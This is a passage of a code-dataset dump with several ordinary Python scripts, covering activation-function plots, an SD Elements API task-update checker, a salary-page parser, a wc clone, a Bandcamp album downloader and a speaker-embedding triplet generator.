8, "usage_type": "name"}, {"api_name": "django.db.migrations.AlterField", "line_number": 15, "usage_type": "call"}, {"api_name": "django.db.migrations", "line_number": 15, "usage_type": "name"}, {"api_name": "django.db.models.UUIDField", "line_number": 18, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 18, "usage_type": "name"}, {"api_name": "uuid.uuid4", "line_number": 18, "usage_type": "attribute"}, {"api_name": "django.db.migrations.AlterField", "line_number": 20, "usage_type": "call"}, {"api_name": "django.db.migrations", "line_number": 20, "usage_type": "name"}, {"api_name": "django.db.models.ForeignKey", "line_number": 23, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 23, "usage_type": "name"}]} +{"seq_id": "485323059", "text": "# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sun Mar 11 20:41:57 2018\n\n@author: brucelau\n\"\"\"\nimport matplotlib\nimport matplotlib.pyplot as plt\nimport numpy as np\nmatplotlib.rcParams['font.sans-serif'] = ['SimHei']\nmatplotlib.rcParams['axes.unicode_minus'] 
= False\ndef tanh(x):\n return (np.exp(x)-np.exp(-x))/(np.exp(x)+np.exp(-x))\ndef sigmoid(x):\n return 1 / (1 + np.exp(-x))\ndef relu(x):\n return np.array([0*item if item<0 else item for item in x ])\n\nx = np.linspace(-10,10,1000)\ny_sigmoid = 1/(1+np.exp(-x))\ny_tanh = (np.exp(x)-np.exp(-x))/(np.exp(x)+np.exp(-x))\ncharactr_size=20\ncolor='red'\nrow,col=2,3\nfig = plt.figure()\n# plot sigmoid\nax = fig.add_subplot(row,col,1)\nax.plot(x,y_sigmoid,color=color)\nax.grid()\nax.set_title('(a) Sigmoid ',fontsize=charactr_size)\n\nax = fig.add_subplot(row,col,1+3)\nax.plot(x,sigmoid(x)*(1-sigmoid(x)),label='hello',color=color)\nax.grid()\nax.set_title('(d) Sigmoid 导数',fontsize=charactr_size)\n\n# plot tanh\nax = fig.add_subplot(row,col,2)\nax.plot(x,y_tanh,color=color)\nax.grid()\nax.set_title('(b) Tanh',fontsize=charactr_size)\n\nax = fig.add_subplot(row,col,2+3)\nax.plot(x,1-tanh(x)**2,color=color)\nax.grid()\nax.set_title('(e) Tanh 导数',fontsize=charactr_size)\n\n# plot relu\nax = fig.add_subplot(row,col,3)\ny_relu = np.array([0*item if item<0 else item for item in x ])\nax.plot(x,y_relu,color=color)\nax.grid()\nax.set_title('(c) ReLu',fontsize=charactr_size)\n\nax = fig.add_subplot(row,col,3+3)\ny_relu = np.array([0*item if item<0 else 1 for item in x ])\nax.plot(x,y_relu,color=color)\nax.grid()\nax.set_title('(f) ReLu 导数',fontsize=charactr_size)\n\n# #plot leaky relu\n# ax = fig.add_subplot(2,4,4)\n# y_relu = np.array([0.2*item if item<0 else item for item in x ])\n# ax.plot(x,y_relu)\n# ax.grid()\n# ax.set_title('(d) Leaky ReLu')\n\nplt.tight_layout()\nplt.show()", "sub_path": "大论文代码/第四章/tensorflow学习代码/激活函数对比图.py", "file_name": "激活函数对比图.py", "file_ext": "py", "file_size_in_byte": 1807, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "52", "api": [{"api_name": "matplotlib.rcParams", "line_number": 10, "usage_type": "attribute"}, {"api_name": "matplotlib.rcParams", "line_number": 11, "usage_type": "attribute"}, {"api_name": "numpy.exp", "line_number": 13, "usage_type": "call"}, {"api_name": "numpy.exp", "line_number": 15, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 17, "usage_type": "call"}, {"api_name": "numpy.linspace", "line_number": 19, "usage_type": "call"}, {"api_name": "numpy.exp", "line_number": 20, "usage_type": "call"}, {"api_name": "numpy.exp", "line_number": 21, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 25, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 25, "usage_type": "name"}, {"api_name": "numpy.array", "line_number": 50, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 56, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.tight_layout", "line_number": 68, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 68, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 69, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 69, "usage_type": "name"}]} +{"seq_id": "411001896", "text": "import collections\nimport os\n\nimport requests\n\n\nSERVER = os.environ['SDE_SERVER'] # e.g. https://cd.sdelements.com\nAPI_TOKEN = os.environ['SDE_API_TOKEN'] # e.g. 
f258c47557a3f98f55d4fbd0icb9d8354c86fbb52\n\nPROJECTS_URL = f'{SERVER}/api/v2/projects/?page_size=100'\n\nREQUESTS_HEADER = {\n 'Authorization': \"Token \" + API_TOKEN, # Authorization header + generated API TOKEN\n 'Accept': \"application/json\"\n}\n\nprint(\"Fetching projects from: {}\".format(PROJECTS_URL))\nprint(\"Using API Token: {}...\".format(API_TOKEN[:5]))\n\nprojects_url = PROJECTS_URL\nwhile True:\n response = requests.get(projects_url, headers=REQUESTS_HEADER, verify=False)\n response.raise_for_status()\n\n data = response.json()\n\n # loop over the projects to accept tasks\n for project_id, name in [(project['id'], project['name']) for project in data['results']]:\n tasks_url = f'{SERVER}/api/v2/projects/{project_id}/task-updates/'\n response = requests.get(tasks_url, headers=REQUESTS_HEADER, verify=False)\n response.raise_for_status()\n\n data = response.json()\n\n if not data[\"results\"]:\n print(f'Project {name} ({project_id}): no updates')\n else:\n added_tasks = 0\n removed_tasks = 0\n for task in data[\"results\"]:\n if task[\"accepted\"] and not task[\"relevant\"]:\n removed_tasks += 1\n elif not task[\"accepted\"] and task[\"relevant\"]:\n added_tasks += 1\n print(f'Project {name} ({project_id}): there are {added_tasks} new tasks and {removed_tasks} removed tasks')\n\n # Grab the URL of the next page of results to fetch; if this entry is\n # blank we have reached the last page\n if \"next\" in data:\n projects_url = data[\"next\"]\n else:\n break\n", "sub_path": "refresh_task_relevance.py", "file_name": "refresh_task_relevance.py", "file_ext": "py", "file_size_in_byte": 1811, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "51", "api": [{"api_name": "os.environ", "line_number": 7, "usage_type": "attribute"}, {"api_name": "os.environ", "line_number": 8, "usage_type": "attribute"}, {"api_name": "requests.get", "line_number": 22, "usage_type": "call"}, {"api_name": "requests.get", "line_number": 30, "usage_type": "call"}]} +{"seq_id": "305941013", "text": "import re\n\nfrom collections import OrderedDict\nimport numpy as np\nfrom bs4 import BeautifulSoup\n\ndef sort_dict(diction):\n \"\"\" Sorts the dict alphabetically \"\"\"\n out = OrderedDict()\n for key in sorted(diction.keys()):\n out[key] = diction[key]\n return out\n\ndef parse_res(respons):\n \"\"\" Parses response from website \"\"\"\n parsed_html = BeautifulSoup(respons, features=\"html.parser\")\n text = parsed_html.body.find('div', attrs={'class':'calculator_area'}).text\n text = re.sub(r'[\\s]+', ' ', text)\n text = re.sub(r'[^a-zA-Z\\d\\s\\,\\.]+', '', text)\n text = text.replace(\"Renten versicherung\", \"Rentenversicherung\")\n text = text.replace(\"Kranken versicherung\", \"Krankennversicherung\")\n text = text.replace(\"Pflege versicherung\", \"Pflegeversicherung\")\n text = text.replace(\"Arbeitslosen versicherung\", \"Arbeitslosenversicherung\")\n text = text.replace(\"Solidaritts zuschlag\", \"Solidaritätszuschlag\")\n\n values = {}\n cur_entity = \"\"\n list_of_entities = [\"Brutto\", \"Vorteil\", \"Solidaritätszuschlag\", \"Kirchensteuer\",\n \"Lohnsteuer\", \"Steuern\", \"Sozialabgaben\",\n \"Rentenversicherung\", \"Krankennversicherung\",\n \"Pflegeversicherung\", \"Arbeitslosenversicherung\", \"Netto\"]\n for word in text.split():\n if word in list_of_entities:\n cur_entity = word\n continue\n if cur_entity in list_of_entities:\n if cur_entity + \"_Monat\" not in values:\n values[cur_entity + '_Monat'] = np.float(word.replace(\".\", 
\"\").replace(\",\", \".\"))\n elif cur_entity + \"_Jahr\" not in values:\n values[cur_entity + '_Jahr'] = np.float(word.replace(\".\", \"\").replace(\",\", \".\"))\n else:\n continue\n values = sort_dict(values)\n return values\n\nif __name__ == \"__main__\":\n print(parse_res(\"abc\"))\n", "sub_path": "parse_res/parse_res.py", "file_name": "parse_res.py", "file_ext": "py", "file_size_in_byte": 1890, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "51", "api": [{"api_name": "collections.OrderedDict", "line_number": 9, "usage_type": "call"}, {"api_name": "bs4.BeautifulSoup", "line_number": 16, "usage_type": "call"}, {"api_name": "re.sub", "line_number": 18, "usage_type": "call"}, {"api_name": "re.sub", "line_number": 19, "usage_type": "call"}, {"api_name": "numpy.float", "line_number": 38, "usage_type": "call"}, {"api_name": "numpy.float", "line_number": 40, "usage_type": "call"}]} +{"seq_id": "600872838", "text": "# coding:utf-8\n\n# two problems\n# python wc.py -l testinputs/test-1 -c testinputs/test-3\n# 如果输错 是否会读下一个文件 python wc.py -l testinputs/test testinputs/test-3\n\nimport argparse\nimport sys\n\nparser = argparse.ArgumentParser() # 创建一个解析对象\nparser.add_argument(\"-l\", help=\"number of lines\", action=\"store_true\")\nparser.add_argument(\"-w\", help=\"number of words\", action=\"store_true\")\nparser.add_argument(\"-c\", help=\"number of bytes\", action=\"store_true\")\nparser.add_argument(\"-m\", help=\"number of chars\", action=\"store_true\")\nparser.add_argument(\"-L\", help=\"number of bytes\", action=\"store_true\")\nparser.add_argument(\"--files0-from\",\n\t\t\t\t\thelp=\"read input from the files specified by NUL-terminated names in file\\nIf F is - then read names from standard input\",\n\t\t\t\t\tdest=\"filelist\", nargs=1)\nparser.add_argument(\"--version\", action='version', version=\"wc.py (GNU coreutils) 8.22\\t\"\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t \"Copyright (C) 2018 Software Engineering\\t\"\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t \"Written by Jiabin Liu\")\nparser.add_argument('filenames', metavar='file', help='input files', nargs='*')\nargs = parser.parse_args() # 进行解析\n\n\ndef calculate_wc(file_file):\n\tline_count, word_count, char_count, byte_count, max_line_length = 0, 0, 0, 0, 0\n\tfor count, line in enumerate(file_file):\n\t\tline_count += line.count(b'\\n') # calculate lines\n\n\t\ta = line.split() # calculate words\n\t\tword_count += len(a)\n\n\t\tline1 = line.decode('utf-8', 'ignore') # calculate chars\n\t\tchar_count += len(line1)\n\n\t\tbyte_count += len(line) # calculate bytes\n\n\t\tlength = len(line) # calculate max lines length\n\t\tutf8_length = len(line.decode('utf-8', 'ignore'))\n\t\treal_length = (utf8_length - length) / 2 + length\n\t\tmax_line_length = max(max_line_length, real_length)\n\tcalculate_dict = (line_count, word_count, char_count, byte_count, max_line_length)\n\treturn calculate_dict\n\n\ndef file_wc(filename):\n\tcalculate_file_wc = ()\n\ttry:\n\t\tdata = open(filename, 'rb')\n\t\tcalculate_file_wc = calculate_wc(data)\n\texcept IOError as e:\n\t\tprint(' No such file or directory', e)\n\tcalculate_file_wc_new = (calculate_file_wc, filename)\n\treturn calculate_file_wc_new\n\n\ndef sum_std_in(std_content): # tuple 还是 tuple\n\tdata__dict = []\n\tfor content in std_content:\n\t\tdata__dict.append(content.encode('utf-8'))\n\tcalculate_sum_std_in = calculate_wc(data__dict)\n\treturn calculate_sum_std_in\n\n\ndef each_file_result(flaglists, wc_result, circulation_filename): # calculate wc of each 
file\n\treal_result = ''\n\tif len(wc_result) == 0:\n\t\treal_result = \"We don't handle that situation yet!\"\n\telif len(wc_result) == 1:\n\t\treal_result = wc_result[0]\n\telse:\n\t\tif 'l' in flaglists:\n\t\t\treal_result += ('\\t%i' % wc_result[0])\n\t\tif 'w' in flaglists:\n\t\t\treal_result += ('\\t%i' % wc_result[1])\n\t\tif 'm' in flaglists:\n\t\t\treal_result += ('\\t%i' % wc_result[2])\n\t\tif 'c' in flaglists:\n\t\t\treal_result += ('\\t%i' % wc_result[3])\n\t\tif 'L' in flaglists:\n\t\t\treal_result += ('\\t%i' % wc_result[4])\n\t\tif circulation_filename or len(wc_result) == 5:\n\t\t\treal_result += ('\\t%s' % circulation_filename)\n\t\telif not circulation_filename: # to show the 'total'\n\t\t\treal_result += ('\\t%s' % wc_result[5])\n\treturn real_result\n\n\ndef wc_wc(flaglists, file_names): # show the final result for the filename of input\n\ttotal_lines, total_words, total_bytes, total_chars, most_max = 0, 0, 0, 0, 0\n\n\tfor filename in file_names:\n\t\twc_result = file_wc(filename) # ((line_count, word_count, char_count, byte_count, max_line_length),filename)\n\t\tprint(each_file_result(flaglists, wc_result[0], filename))\n\n\t\t# calculate total\n\t\tif len(wc_result[0]) > 1:\n\t\t\ttotal_lines += wc_result[0][0]\n\t\t\ttotal_words += wc_result[0][1]\n\t\t\ttotal_bytes += wc_result[0][2]\n\t\t\ttotal_chars += wc_result[0][3]\n\t\t\tif wc_result[0][4] > most_max:\n\t\t\t\tmost_max = wc_result[0][4]\n\n\t# print total\n\tif len(file_names) > 1:\n\t\tprint(each_file_result(flaglists, (total_lines, total_words, total_bytes, total_chars, most_max, \"total\"), ''))\n\n\ndef wc_wc_std_in(flaglists, file_names): # for the std_in\n\twc_result = sum_std_in(file_names)\n\tprint(each_file_result(flaglists, wc_result, ''))\n\n\ndef filter_check_flags(args_resolve):\n\targs_dict = args_resolve.__dict__\n\tflag_lists = []\n\tfor key, value in args_dict.items():\n\t\tif value is True:\n\t\t\tflag_lists.append(key)\n\tif not flag_lists:\n\t\tflag_lists_initial = ['l', 'w', 'c']\n\t\treturn flag_lists_initial\n\telse:\n\t\treturn flag_lists\n\n\ndef files0_from_extract_from_read_std_in(std_in_contents): # read from --files0-from= std_in\n\tfilename_list = []\n\tif '\\0' not in std_in_contents:\n\t\tprint(std_in_contents)\n\t\tfilename_list = ['-']\n\telse:\n\t\tcontent_list_null = std_in_contents.split('\\0')\n\t\tfor iii in content_list_null:\n\t\t\treal_filename = iii.strip()\n\t\t\tif len(real_filename) > 0:\n\t\t\t\tfilename_list.append(real_filename)\n\treturn filename_list\n\n\ndef files0_from_extract_from_file(command_file): # read from --files0-from= file\n\twith open(command_file) as f:\n\t\tdata = f.read()\n\t\tfile_namelist = files0_from_extract_from_read_std_in(data)\n\treturn file_namelist\n\n\nif __name__ == '__main__':\n\tdict_new = vars(args)\n\t# print(dict_new) # show real args\n\t# print(dict_new['filenames'] == ['-'])\n\t# print(flags_filter(args))\n\t# pre_args = parser.parse_args(pre_process_sys_argv())\n\n\tif args.filenames and args.filelist:\n\t\tprint('file operands cannot be combined with --files0-from')\n\n\telif args.filenames:\n\t\ttry:\n\t\t\t\twc_wc(filter_check_flags(args), args.filenames)\n\t\texcept IOError as e: # IOError失败\n\t\t\tprint('wc.py' + args.filenames + ': No such file or directory')\n\n\telif args.filelist:\n\t\ttry:\n\t\t\tnew_list = args.filelist\n\t\t\tfile_names_new = []\n\t\t\tif len(new_list) == 1 and len(new_list) == new_list.count('-'): # 从 --files0-from=- 标准输入读取\n\t\t\t\tinput_content = sys.stdin.read()\n\t\t\t\tfile_names_new = 
files0_from_extract_from_read_std_in(input_content)\n\n\t\t\telse:\n\t\t\t\tfile_names_new = files0_from_extract_from_file(new_list[0]) # read names from the --files0-from= file\n\t\t\twc_wc(filter_check_flags(args), file_names_new)\n\t\texcept IOError as e:\n\t\t\terror_name = \"\".join(args.filelist)\n\t\t\tprint('wc.py: cannot open \\'' + error_name + '\\' for reading: No such file or directory')\n\n\telif len(dict_new['filenames']) == 0 or dict_new['filenames'] == ['-']: # python wc.py - raises an error\n\t\tstandard_input_content = sys.stdin.readlines() # read from standard input and compute wc\n\t\tif filter_check_flags(args) == ['l', 'w', 'c']:\n\t\t\twc_wc_std_in(filter_check_flags(args), standard_input_content)\n\t\telse:\n\t\t\tprint(each_file_result(filter_check_flags(args), sum_std_in(standard_input_content), ''))\n", "sub_path": "wc.py", "file_name": "wc.py", "file_ext": "py", "file_size_in_byte": 6525, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "51", "api": [{"api_name": "argparse.ArgumentParser", "line_number": 10, "usage_type": "call"}, {"api_name": "sys.stdin.read", "line_number": 171, "usage_type": "call"}, {"api_name": "sys.stdin", "line_number": 171, "usage_type": "attribute"}, {"api_name": "sys.stdin.readlines", "line_number": 182, "usage_type": "call"}, {"api_name": "sys.stdin", "line_number": 182, "usage_type": "attribute"}]} +{"seq_id": "623948286", "text": "import requests\nimport sys\n\nimport os\nimport re\nimport json\nimport mutagen\nfrom threading import Thread\n\nfrom mutagen.mp3 import MP3\nfrom mutagen.id3 import APIC, ID3, TALB\nfrom mutagen.easyid3 import EasyID3\n\ndef add_tags(folder, title, artist, image, album):\n    song = MP3(\"{}/{}.mp3\".format(folder, title.replace(' ','-')))\n\n    try:\n        song.add_tags()\n    except mutagen.id3._util.error:\n        pass\n\n    song.tags.add(\n        APIC(\n            encoding=3,\n            mime='image/jpeg',\n            type=3,\n            desc=u\"\",\n            data=requests.get(image).content\n        )\n    )\n    song.save()\n    song = EasyID3(\"{}/{}.mp3\".format(folder, title.replace(' ', '-')))\n    song['title'] = title\n    song['artist'] = artist\n    song.save()\n\ndef download(title, link, folder, image, artist):\n    print(\"Downloading {} by {}.\".format(title, artist))\n    with open(\"{}/{}.mp3\".format(folder, title.replace(' ','-')), 'wb') as song:\n        song.write(requests.get(link, headers={'Accept-Encoding': None}).content)\n\n    add_tags(folder, title, artist, image, folder)\n    print(\"Finished downloading {} by {}.\".format(title, artist))\n\n\ndef main(url):\n    by = url.split(\"/\")[0]\n    album = url.split(\"/\")[1]\n    folder_name = \"{} - {}\".format(by, album)\n    if not os.path.exists(folder_name):\n        os.makedirs(folder_name)\n    url = \"https://{}.bandcamp.com/album/{}\".format(by, album)\n    data = requests.get(url, headers={\"Cache-Control\": \"max-age=0\"})\n    st = str(data.content).split('trackinfo : ')[1].split(']')[0] + \"]\"\n    st = re.sub(\"\\\\\\\\\", \"\\/\", st)\n    artist = str(data.content).split('\\\"byArtist\\\">')[1].split(\"\")[0].split(\">\")[1]\n    image_url = str(data.content).split(\"artFullsizeUrl: \\\"\")[1].split(\"\\\",\")[0]\n\n    for x in json.loads(st):\n        try:\n            title = x['title']\n            url = x['file']['mp3-128']\n            title = re.sub(r\"[^A-z0-9- ]\",\"\", title)\n            Thread(target=download, args=(title, url, folder_name, image_url, artist)).start()  # start() returns None, so it cannot be chained with .join()\n        except AttributeError:\n            pass\n        except TypeError:\n            pass\n\n\nif __name__ == '__main__':\n    main(sys.argv[1])", "sub_path": "b.py", "file_name": "b.py", "file_ext": "py", "file_size_in_byte": 2005, "program_lang": "python", "lang": "en", 
"doc_type": "code", "dataset": "code-starcoder2", "pt": "52", "api": [{"api_name": "mutagen.mp3.MP3", "line_number": 15, "usage_type": "call"}, {"api_name": "mutagen.id3", "line_number": 19, "usage_type": "attribute"}, {"api_name": "mutagen.id3.APIC", "line_number": 23, "usage_type": "call"}, {"api_name": "requests.get", "line_number": 28, "usage_type": "call"}, {"api_name": "mutagen.easyid3.EasyID3", "line_number": 32, "usage_type": "call"}, {"api_name": "requests.get", "line_number": 40, "usage_type": "call"}, {"api_name": "os.path.exists", "line_number": 50, "usage_type": "call"}, {"api_name": "os.path", "line_number": 50, "usage_type": "attribute"}, {"api_name": "os.makedirs", "line_number": 51, "usage_type": "call"}, {"api_name": "requests.get", "line_number": 53, "usage_type": "call"}, {"api_name": "re.sub", "line_number": 55, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 59, "usage_type": "call"}, {"api_name": "re.sub", "line_number": 63, "usage_type": "call"}, {"api_name": "threading.Thread", "line_number": 64, "usage_type": "call"}, {"api_name": "sys.argv", "line_number": 72, "usage_type": "attribute"}]} +{"seq_id": "328248227", "text": "from toy_2d import *\nfrom train_resnet_test_small import get_class_num\nimport os\nimport torch\nfrom torch.autograd import Variable\nimport numpy as np\nimport pickle\nimport pdb\nfrom scipy.spatial.distance import cosine\nimport random\n\n\ndef to_variable(tensor):\n # Tensor -> Variable (on GPU if possible)\n if torch.cuda.is_available():\n # Tensor -> GPU Tensor\n tensor = tensor.cuda()\n return Variable(tensor)\n\n\n# class ClassificationDataset(Dataset):\n# def __init__(self, dir, train_file, dev_file, person2label_map):\n# self.dir = dir\n# self.data_files = []\n# with open(train_file) as f:\n# self.data_files.extend(f.readlines())\n# with open(dev_file) as f:\n# self.data_files.extend(f.readlines())\n#\n# with open(person2label_map, 'rb') as handle:\n# self.label_dict = pickle.load(handle)\n#\n# self.total_labels = len(self.label_dict)\n#\n# def __getitem__(self, item):\n# # Get training data\n# filename = self.data_files[item].strip()\n# X = np.load(self.dir + filename)\n#\n# # Build data label one-hot vector\n# person = filename.split(\"-\")[0]\n# idx = np.array([self.label_dict[person]])\n# # Y = np.zeros([self.total_labels], dtype=float)\n# # Y[idx] = 1\n#\n# return filename, to_tensor(X), to_tensor(idx)\n#\n# def __len__(self):\n# return len(self.data_files)\n\n\nclass ClassificationDataset(Dataset):\n def __init__(self, dir, train_file, person2label_map):\n self.dir = dir\n self.data_files = []\n with open(train_file) as f:\n self.data_files.extend(f.readlines())\n\n with open(person2label_map, 'rb') as handle:\n self.label_dict = pickle.load(handle)\n\n self.total_labels = len(self.label_dict)\n\n def __getitem__(self, item):\n # Get training data\n filename = self.data_files[item].strip()\n X = np.load(self.dir + filename)\n\n # Build data label one-hot vector\n person = filename.split(\"-\")[0]\n idx = np.array([self.label_dict[person]])\n # Y = np.zeros([self.total_labels], dtype=float)\n # Y[idx] = 1\n\n return filename, to_tensor(X), to_tensor(idx)\n\n def __len__(self):\n return len(self.data_files)\n\n\nclass MyAllDataset(Dataset):\n def __init__(self, dir, all_file):\n self.dir = dir\n self.data_files = []\n with open(all_file, \"r\") as f:\n self.data_files.extend(f.readlines())\n\n def __getitem__(self, item):\n # Get training data\n filename = self.data_files[item].strip().split()[-1]\n X = 
np.load(self.dir + filename)\n\n return filename, to_tensor(X)\n\n def __len__(self):\n return len(self.data_files)\n\n\ndef classify_all(num_classes):\n batch_size = 128\n cls_dir = \"./vectors/\"\n all_file = \"all.txt\"\n\n # Load dataset\n dir = \"./new_features_2000/\" # directory of single training instances\n my_dataset = MyAllDataset(dir, all_file)\n dataloader = torch.utils.data.DataLoader(my_dataset, batch_size=batch_size, shuffle=False)\n\n # Load Model\n model_path = \"./best_state_toy\"\n model = DeepSpeakerModel(num_classes)\n model.load_state_dict(torch.load(model_path, map_location=lambda storage, loc: storage))\n model.eval()\n\n if torch.cuda.is_available():\n # Move the network and the optimizer to the GPU\n model = model.cuda()\n for (filenames, input_val) in dataloader:\n prediction, feats = model(to_variable(input_val))\n feats = feats.data.cpu().numpy()\n\n for i in range(len(filenames)):\n filename = filenames[i]\n np.save(cls_dir + filename[:-4], np.expand_dims(feats[i], 0)) # Save feature vector for current data\n\n\ndef find_misclassify(num_classes):\n batch_size = 128\n wrong_pred_file = \"wrong_classification.pickle\"\n person2label_map = \"person2label_map.pickle\"\n train_file = \"train.txt\"\n # dev_file = \"dev3.txt\"\n cls_dir = \"./vectors/\"\n misclassied = {}\n\n # Load dataset\n dir = \"./new_features_2000/\" # directory of single training instances\n classification_dataset = ClassificationDataset(dir, train_file, person2label_map)\n dataloader = torch.utils.data.DataLoader(classification_dataset, batch_size=batch_size, shuffle=False)\n\n # Load Model\n # model_path = \"./best_state\"\n # model = DeepSpeakerModel(num_classes)\n # model.load_state_dict(torch.load(model_path, map_location=lambda storage, loc: storage))\n # model.eval()\n #\n # if torch.cuda.is_available():\n # # Move the network and the optimizer to the GPU\n # model = model.cuda()\n\n for (filenames, input_val, labels) in dataloader:\n # predictions, feats = model(to_variable(input_val))\n # predictions = torch.max(predictions, dim=1)[1].cpu().data.numpy()\n labels = labels.numpy()\n\n for i in range(len(filenames)):\n filename = filenames[i]\n label = labels[i][0]\n # prediction = predictions[i]\n prediction = np.load(cls_dir + filename)\n prediction = prediction.argmax(axis=1)[0]\n\n person = filename.split(\"-\")[0]\n\n if int(prediction) != int(label):\n if person not in misclassied:\n misclassied[person] = {}\n\n misclassied[person][filename] = (prediction, int(label))\n\n with open(wrong_pred_file, 'wb') as handle:\n pickle.dump(misclassied, handle, protocol=pickle.HIGHEST_PROTOCOL)\n\n\ndef get_misclassified_triplets(misclassified):\n triplets = []\n label2person_map = \"label2person_map.pickle\"\n with open(label2person_map, 'rb') as handle:\n label2person = pickle.load(handle)\n\n # Build a dictionary storing each person's files\n vector_dir = \"./vectors/\"\n file_dict = {}\n files = os.listdir(vector_dir)\n added_triplets = set([])\n for filename in files:\n person = filename.split(\"-\")[0]\n if person not in file_dict:\n file_dict[person] = []\n file_dict[person].append(filename)\n\n # Iterate all wrongly classified files\n for person in misclassified:\n for anchor_file in misclassified[person]:\n anchor = anchor_file.split(\"-\")[0]\n anchor_vec = np.load(vector_dir + anchor_file)\n\n negative_person = label2person[misclassified[person][anchor_file][0]]\n d_a_n = {}\n for negative_file in file_dict[negative_person]:\n # Distance between Anchor and Negative\n 
d_a_n[negative_file] = cosine(anchor_vec, np.load(vector_dir + negative_file))\n\n # Iterate all positive files for the same person\n for positive_file in file_dict[anchor]:\n if positive_file == anchor_file:\n continue\n\n # Cosine distance (1 - similarity) between Anchor and Positive\n d_a_p = cosine(anchor_vec, np.load(vector_dir + positive_file))\n\n for negative_file in d_a_n:\n # Compare Distance. If condition satisfied, add the triplet.\n if d_a_n[negative_file] <= d_a_p:\n triplets.append((anchor_file, positive_file, negative_file))\n temp = anchor_file + \"#\" + positive_file + \"#\" + negative_file\n added_triplets.add(temp)\n\n return triplets, added_triplets\n\n\ndef get_general_triplets(added_triplets):\n all_file_path = \"all.txt\"\n vector_dir = \"./vectors/\"\n triplets = []\n persons = {}\n\n with open(all_file_path, \"r\") as f:\n all_files = f.readlines()\n for each_file in all_files:\n each_file = each_file.strip().split()[-1]\n person = each_file.split(\"-\")[0]\n if person not in persons:\n persons[person] = []\n persons[person].append(each_file)\n\n for person in persons:\n # Choose current person as the anchor person\n files = persons[person]\n # Skip if this person only has one file\n if len(files) < 2:\n continue\n\n for i in range(len(files) - 1):\n anchor_file = files[i]\n anchor_vec = np.load(vector_dir + anchor_file)\n # Randomly choose a positive file\n positive_file = files[random.randint(i + 1, len(files) - 1)]\n positive_vec = np.load(vector_dir + positive_file)\n\n d_a_p = cosine(anchor_vec, positive_vec)\n\n # For rest of other persons, choose one for each as negative files\n samples = random.sample(list(persons), 40) # Around 15000 files\n for diff_person in samples:\n if diff_person == person:\n continue\n\n diff_files = persons[diff_person]\n negative_file = diff_files[random.randint(0, len(diff_files) - 1)]\n\n temp = anchor_file + \"#\" + positive_file + \"#\" + negative_file\n if temp in added_triplets:\n continue\n added_triplets.add(temp)\n\n negative_vec = np.load(vector_dir + negative_file)\n d_a_n = cosine(anchor_vec, negative_vec)\n if d_a_n <= d_a_p:\n triplets.append((anchor_file, positive_file, negative_file))\n\n return triplets\n\n\nif __name__ == \"__main__\":\n # classes = get_class_num()\n classes = 2382\n # classify_all(classes)\n print(\"Finished classifying!\")\n\n # find_misclassify(classes)\n print(\"Finished finding mis-classification!\")\n with open(\"wrong_classification.pickle\", \"rb\") as handle:\n misclassified = pickle.load(handle)\n\n triplets, added_triplets = get_misclassified_triplets(misclassified)\n print(\"Finished generating misclassified triplets!\")\n\n # Write all triplets to a file\n output_file = open(\"triplets_misclassified.csv\", 'w')\n for triplet in triplets:\n output_file.write(triplet[0] + \",\" + triplet[1] + \",\" + triplet[2] + \"\\n\")\n output_file.close()\n\n # Randomly sample triplets\n triplets = random.choices(triplets, k=int(0.03 * len(triplets)))\n\n general_triplets = get_general_triplets(added_triplets)\n\n # Write all triplets to a file\n output_file = open(\"triplets_general.csv\", 'w')\n for triplet in general_triplets:\n output_file.write(triplet[0] + \",\" + triplet[1] + \",\" + triplet[2] + \"\\n\")\n output_file.close()\n\n # Randomly sample triplets\n # general_triplets = random.choices(general_triplets, k=int(0.2 * len(general_triplets)))\n\n triplets.extend(general_triplets)\n # Write all triplets to a file\n output_file = open(\"triplets.csv\", 'w')\n for triplet in triplets:\n 
output_file.write(triplet[0] + \",\" + triplet[1] + \",\" + triplet[2] + \"\\n\")\n output_file.close()\n print(\"All done!\")\n", "sub_path": "get_triplets_general.py", "file_name": "get_triplets_general.py", "file_ext": "py", "file_size_in_byte": 10850, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "51", "api": [{"api_name": "torch.cuda.is_available", "line_number": 15, "usage_type": "call"}, {"api_name": "torch.cuda", "line_number": 15, "usage_type": "attribute"}, {"api_name": "torch.autograd.Variable", "line_number": 18, "usage_type": "call"}, {"api_name": "pickle.load", "line_number": 60, "usage_type": "call"}, {"api_name": "numpy.load", "line_number": 67, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 71, "usage_type": "call"}, {"api_name": "numpy.load", "line_number": 91, "usage_type": "call"}, {"api_name": "torch.utils.data.DataLoader", "line_number": 107, "usage_type": "call"}, {"api_name": "torch.utils", "line_number": 107, "usage_type": "attribute"}, {"api_name": "torch.load", "line_number": 112, "usage_type": "call"}, {"api_name": "torch.cuda.is_available", "line_number": 115, "usage_type": "call"}, {"api_name": "torch.cuda", "line_number": 115, "usage_type": "attribute"}, {"api_name": "numpy.save", "line_number": 124, "usage_type": "call"}, {"api_name": "numpy.expand_dims", "line_number": 124, "usage_type": "call"}, {"api_name": "torch.utils.data.DataLoader", "line_number": 139, "usage_type": "call"}, {"api_name": "torch.utils", "line_number": 139, "usage_type": "attribute"}, {"api_name": "numpy.load", "line_number": 160, "usage_type": "call"}, {"api_name": "pickle.dump", "line_number": 172, "usage_type": "call"}, {"api_name": "pickle.HIGHEST_PROTOCOL", "line_number": 172, "usage_type": "attribute"}, {"api_name": 